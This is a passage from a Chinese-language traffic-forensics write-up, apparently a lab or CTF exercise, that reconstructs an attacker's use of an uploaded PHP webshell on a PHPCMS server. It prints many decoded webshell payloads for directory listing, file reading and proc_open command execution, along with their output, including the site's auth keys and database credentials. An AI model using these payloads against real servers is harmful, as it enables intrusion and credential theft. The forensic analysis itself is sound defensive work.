@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取 C:\\phpStudy\\WWW\\ 目录下的所有文件

然后再看另一个小马文件 :

grep -n -C 32 'POST /uploadfile/2017/0905/20170905055411283.php' http.txt | grep array_map | sed 's/%3D/\=/g' | sed 's/%2F/\//g' | sed 's/%2B/\+/g' | grep -E 'xx\(.+' -o | sed 's/^xx//g' > base64

http ›› ipython                                                                                                                                                                              
In [1]: with open("base64") as f:
   ...:     for line in f:
   ...:         print line[2:-12].decode("base64")

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/crons/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/include/crons/ 下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/include/ 下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/include/ 下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/ 下的所有文件
X@Yphpsso_server/   2017-09-03 03:31:30 4096    0777
api/    2017-09-03 03:31:44 4096    0777
statics/    2017-09-03 03:31:44 4096    0777
caches/ 2017-09-03 03:45:14 4096    0777
./  2017-09-03 03:38:34 4096    0777
html/   2017-09-03 03:37:50 4096    0777
phpcms/ 2017-09-03 03:31:27 4096    0777
../ 2017-09-03 03:30:49 4096    0755
uploadfile/ 2017-09-05 02:25:38 4096    0777
api.php 2017-09-03 03:31:44 989 0777
plugin.php  2017-09-03 03:31:44 3593    0777
favicon.ico 2017-09-03 03:31:44 3158    0777
js.html 2017-09-03 03:31:44 520 0777
crossdomain.xml 2017-09-03 03:31:44 104 0777
admin.php   2017-09-03 03:31:44 48  0777
robots.txt  2017-09-03 03:31:44 170 0777
index.php   2017-09-03 03:31:44 313 0777
index.html  2017-09-05 00:13:08 9578    0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='/var/www/html/api.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// 读取文件 /var/www/html/api.php 内容
<?php                  
/**                       
 *  index.php API ....    
 *                        
 * @copyright           (C) 2005-2010 PHPCMS
 * @license             http://www.phpcms.cn/license/
 * @lastmodify          2010-7-26
 */                       
define('PHPCMS_PATH', dirname(__FILE__).DIRECTORY_SEPARATOR);
include PHPCMS_PATH.'phpcms/base.php';
$param = pc_base::load_sys_class('param');
$_userid = param::get_cookie('_userid');
if($_userid) {            
    $member_db = pc_base::load_model('member_model');
    $_userid = intval($_userid);
    $memberinfo = $member_db->get_one(array('userid'=>$_userid),'islock');
    if($memberinfo['islock']) exit('<h1>Bad Request!</h1>');
}                         
$op = isset($_GET['op']) && trim($_GET['op']) ? trim($_GET['op']) : exit('Operation can not be empty');
if (isset($_GET['callback']) && !preg_match('/^[a-zA-Z_][a-zA-Z0-9_]+$/', $_GET['callback']))  unset($_GET['callback']);
if (!preg_match('/([^a-z_]+)/i',$op) && file_exists(PHPCMS_PATH.'api/'.$op.'.php')) {
    include PHPCMS_PATH.'api/'.$op.'.php';
} else {                  
    exit('API handler does not exist');
}                         
?>

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/phpcms/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/phpcms/ 下的所有文件
model/   2017-09-03 03:31:17 4096    0777
libs/   2017-09-03 03:31:16 4096    0777
languages/  2017-09-03 03:31:15 4096    0777
./  2017-09-03 03:31:27 4096    0777
plugin/ 2017-09-03 03:31:27 4096    0777
templates/  2017-09-03 03:31:27 4096    0777
../ 2017-09-03 03:38:34 4096    0777
modules/    2017-09-03 03:31:27 4096    0777
base.php    2017-09-03 03:31:15 8462    0777
index.html  2017-09-03 03:31:15 1   0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='/var/www/html/phpcms/base.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// 读取文件 /var/www/html/phpcms/base.php 内容
<?php
/**
 *  base.php PHPCMS............
 *
 * @copyright           (C) 2005-2010 PHPCMS
 * @license             http://www.phpcms.cn/license/
 * @lastmodify          2010-6-7
 */
define('IN_PHPCMS', true);                                                                     
//PHPCMS........
define('PC_PATH', dirname(__FILE__).DIRECTORY_SEPARATOR);
if(!defined('PHPCMS_PATH')) define('PHPCMS_PATH', PC_PATH.'..'.DIRECTORY_SEPARATOR);
...

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/caches/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/caches/ 下的所有文件
caches_admin/    2017-09-03 03:37:50 4096    0777
caches_content/ 2017-09-03 03:37:50 4096    0777
poster_js/  2017-09-03 03:37:50 4096    0777
bakup/  2017-09-03 03:37:50 4096    0777
caches_commons/ 2017-09-03 03:37:50 4096    0777
caches_tpl_data/    2017-09-03 03:37:50 4096    0777
caches_linkage/ 2017-09-03 03:37:50 4096    0777
caches_model/   2017-09-03 03:37:50 4096    0777
./  2017-09-03 03:45:14 4096    0777
vote_js/    2017-09-03 03:37:50 4096    0777
caches_search/  2017-09-03 03:38:33 4096    0755
caches_scan/    2017-09-03 03:37:50 4096    0777
caches_member/  2017-09-03 03:37:50 4096    0777
sessions/   2017-09-03 03:37:50 4096    0777
../ 2017-09-03 03:38:34 4096    0777
configs/    2017-09-03 03:37:50 4096    0777
caches_template/    2017-09-03 03:45:14 4096    0777
install.lock    2017-09-03 03:38:34 0   0644
error_log.php   2017-09-05 02:54:12 769 0644
index.html  2017-09-03 03:31:45 1   0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/caches/configs/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/caches/configs/ 下的所有文件
./   2017-09-03 03:37:50 4096    0777
../ 2017-09-03 03:45:14 4096    0777
ku6server.php   2017-09-03 03:31:45 208 0777
sub_config.php  2017-09-03 03:31:45 1376    0777
route.php   2017-09-03 03:31:45 803 0777
credit.php  2017-09-03 03:31:45 122 0777
cache.php   2017-09-03 03:31:45 330 0777
database.php    2017-09-03 03:38:32 324 0777
model_config.php    2017-09-03 03:31:45 52  0777
version.php 2017-09-03 03:31:45 118 0777
modules.php 2017-09-03 03:38:33 212 0777
ku6status_config.php    2017-09-03 03:31:45 781 0777
snda.php    2017-09-03 03:31:45 51  0777
system.php  2017-09-05 00:11:58 2430    0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='/var/www/html/caches/configs/system.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// 读取文件 /var/www/html/caches/configs/system.php 内容
X@Y<?php                 
return array(            
//........               
'web_path' => '/',                                                                                                     
//Session....     
'session_storage' => 'mysql',
'session_ttl' => 1800,   
'session_savepath' => CACHE_PATH.'sessions/',
'session_n' => 0,        
//Cookie....             
'cookie_domain' => '', //Cookie ......
'cookie_path' => '', //Cookie ........
'cookie_pre' => 'LTBnY_', //Cookie ......................................Cookie....
'cookie_ttl' => 0, //Cookie ..........0 ................
//............           
'tpl_root' => 'templates/', //................
'tpl_name' => 'default', //................
'tpl_css' => 'default', //............
'tpl_referesh' => 1,     
'tpl_edit'=> 0,//....................
//............           
'upload_path' => PHPCMS_PATH.'uploadfile/',
'upload_url' => 'http://192.168.20.88/uploadfile/', //........
'attachment_stat' => '1',//.................... 0 .... 1 ...... ....: ......................
'js_path' => 'http://192.168.20.88/statics/js/', //CDN JS
'css_path' => 'http://192.168.20.88/statics/css/', //CDN CSS
'img_path' => 'http://192.168.20.88/statics/images/', //CDN img
'app_path' => 'http://192.168.20.88/',//................
'charset' => 'gbk', //..........
'timezone' => 'Etc/GMT-8', //..............php 5.1................Etc/GMT-8 ............ GMT+8
'debug' => 0, //................
'admin_log' =>           
17:57:02.163812 IP 192.168.20.117.1423 > 172.16.10.110.8888: Flags [P.], seq 1461:2610, ack 768, win 63472, length 1149
E....;@...Q|...u..       
n..".-.<X.#o,P...Y... 1, //....................
'errorlog' => 1, //1................ cache/error_log.php | 0................
'gzip' => 1, //....Gzip..........
'auth_key' => 'AivCd1tuXDZfzVOKBybL', //....
'lang' => 'zh-cn',  //..........
'lock_ex' => '1',  //........................................nfs..........
'admin_founders' => '1', //..........ID......ID........
'execution_sql' => 0, //EXECUTION_SQL
'execution_sql' => 0, //EXECUTION_SQL
'phpsso' => '1',    //........phpsso
'phpsso_appid' => '1',  //....id    
'phpsso_api_url' => 'http://192.168.20.88/phpsso_server',   //........
'phpsso_auth_key' => 'AUch7BSWgtuikaORhVcUyOgkyY69Glwb', //........
'phpsso_version' => '1', //phpsso....
'html_root' => '/html',//................
'safe_card'=>'1',//..............
'connect_enable' => '1',    //..................
'sina_akey' => '',  //sina AKEY
'sina_skey' => '',  //sina SKEY
'snda_akey' => '',  //.......... akey
'snda_skey' => '',  //.......... skey
'qq_akey' => '',    //qq skey
'qq_skey' => '',    //qq skey
'qq_appkey' => '',  //QQ........ appkey
'qq_appid' => '',   //QQ........ appid
'qq_callback' => '',    //QQ........ callback
'admin_url' => '',  //..................
);                        
?>


@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /var/www/html/include/;whoami;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 执行命令 whoami
www-data

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /var/www/html/uploadfile/2017/0905/;uname -a;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 执行命令 uname -a
Linux localhost 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /var/www/html/uploadfile/2017/0905/;ipconfig;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 执行命令 : pwd
/var/www/html/uploadfile/2017/0905

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='/bin/sh';$s='cd /var/www/html/uploadfile/2017/0905/;ifconfig;echo [S];pwd;echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 执行命令 ifconfig
ens33     Link encap:Ethernet  HWaddr 00:0c:29:da:d6:4e  
          inet addr:192.168.20.88  Bcast:192.168.20.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:feda:d64e/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:150300 errors:0 dropped:0 overruns:0 frame:0
          TX packets:49841 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:162871217 (162.8 MB)  TX bytes:5569466 (5.5 MB)
                         
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:227 errors:0 dropped:0 overruns:0 frame:0
          TX packets:227 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:20038 (20.0 KB)  TX bytes:20038 (20.0 KB)
              

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/include/ 下的所有文件
ERROR:// Path Not Found Or No Permission!

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/ 下的所有文件
./   2017-09-03 03:30:49 4096    0755
html/   2017-09-03 03:38:34 4096    0777
../ 2017-09-03 00:57:48 4096    0755

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/ 下的所有文件
phpsso_server/   2017-09-03 03:31:30 4096    0777
api/    2017-09-03 03:31:44 4096    0777
statics/    2017-09-03 03:31:44 4096    0777
caches/ 2017-09-03 03:45:14 4096    0777
./  2017-09-03 03:38:34 4096    0777
html/   2017-09-03 03:37:50 4096    0777
phpcms/ 2017-09-03 03:31:27 4096    0777
../ 2017-09-03 03:30:49 4096    0755
uploadfile/ 2017-09-05 02:25:38 4096    0777
api.php 2017-09-03 03:31:44 989 0777
plugin.php  2017-09-03 03:31:44 3593    0777
favicon.ico 2017-09-03 03:31:44 3158    0777
js.html 2017-09-03 03:31:44 520 0777
crossdomain.xml 2017-09-03 03:31:44 104 0777
admin.php   2017-09-03 03:31:44 48  0777
robots.txt  2017-09-03 03:31:44 170 0777
index.php   2017-09-03 03:31:44 313 0777
index.html  2017-09-05 00:13:08 9578    0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/ 下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/phpcms/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/phpcms/ 下的所有文件
./   2017-09-03 03:31:16 4096    0777
classes/    2017-09-03 03:31:16 4096    0777
data/   2017-09-03 03:31:16 4096    0777
../ 2017-09-03 03:31:27 4096    0777
functions/  2017-09-03 03:31:16 4096    0777
index.html  2017-09-03 03:31:16 1   0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/phpcms/libs/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/phpcms/libs/ 下的所有文件
./   2017-09-03 03:31:16 4096    0777
classes/    2017-09-03 03:31:16 4096    0777
data/   2017-09-03 03:31:16 4096    0777
../ 2017-09-03 03:31:27 4096    0777
functions/  2017-09-03 03:31:16 4096    0777
index.html  2017-09-03 03:31:16 1   0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/phpcms/libs/data/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/phpcms/libs/data/ 下的所有文件
./   2017-09-03 03:31:16 4096    0777
font/   2017-09-03 03:31:16 4096    0777
../ 2017-09-03 03:31:16 4096    0777
ipdata/ 2017-09-03 03:31:16 4096    0777 
dict/   2017-09-03 03:31:16 4096    0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/include/ 下的所有文件
ERROR:// Path Not Found Or No Permission!

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/caches/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/caches/ 下的所有文件
caches_admin/    2017-09-03 03:37:50 4096    0777
caches_content/ 2017-09-03 03:37:50 4096    0777
poster_js/  2017-09-03 03:37:50 4096    0777
bakup/  2017-09-03 03:37:50 4096    0777
caches_commons/ 2017-09-03 03:37:50 4096    0777
caches_tpl_data/    2017-09-03 03:37:50 4096    0777
caches_linkage/ 2017-09-03 03:37:50 4096    0777
caches_model/   2017-09-03 03:37:50 4096    0777
./  2017-09-03 03:45:14 4096    0777
vote_js/    2017-09-03 03:37:50 4096    0777
caches_search/  2017-09-03 03:38:33 4096    0755
caches_scan/    2017-09-03 03:37:50 4096    0777
caches_member/  2017-09-03 03:37:50 4096    0777
sessions/   2017-09-03 03:37:50 4096    0777
../ 2017-09-03 03:38:34 4096    0777
configs/    2017-09-03 03:37:50 4096    0777
caches_template/    2017-09-03 03:45:14 4096    0777
install.lock    2017-09-03 03:38:34 0   0644
error_log.php   2017-09-05 02:54:12 769 0644
index.html  2017-09-03 03:31:45 1   0777


@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/caches/configs/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/caches/configs/ 下的所有文件
./   2017-09-03 03:37:50 4096    0777
../ 2017-09-03 03:45:14 4096    0777
ku6server.php   2017-09-03 03:31:45 208 0777
sub_config.php  2017-09-03 03:31:45 1376    0777
route.php   2017-09-03 03:31:45 803 0777
credit.php  2017-09-03 03:31:45 122 0777
cache.php   2017-09-03 03:31:45 330 0777
database.php    2017-09-03 03:38:32 324 0777
model_config.php    2017-09-03 03:31:45 52  0777
version.php 2017-09-03 03:31:45 118 0777
modules.php 2017-09-03 03:38:33 212 0777
ku6status_config.php    2017-09-03 03:31:45 781 0777
snda.php    2017-09-03 03:31:45 51  0777
system.php  2017-09-05 00:11:58 2430    0777

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='/var/www/html/caches/configs/database.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// 读取文件 /var/www/html/caches/configs/database.php 内容

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F="/var/www/html/caches/configs/database.php";$fp=@fopen($F,'r');if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo('ERROR:// Can Not Read');};echo("X@Y");die();
// 读取文件 /var/www/html/caches/configs/database.php 内容
<?php                 
return array (           
    'default' => array ( 
        'hostname' => 'localhost',
        'port' => 3306,  
        'database' => 'phpcmsv9',
        'username' => 'root',
        'password' => '123456',
        'tablepre' => 'v9_',
        'charset' => 'gbk',
        'type' => 'mysqli',
        'debug' => true,
        'pconnect' => 0,
        'autoconnect' => 0
        ),
);                                           
?>

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/include/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/include/ 下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/var/www/html/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 读取目录 /var/www/html/ 下的所有文件

攻击者的思路以及攻击流程也理清楚了
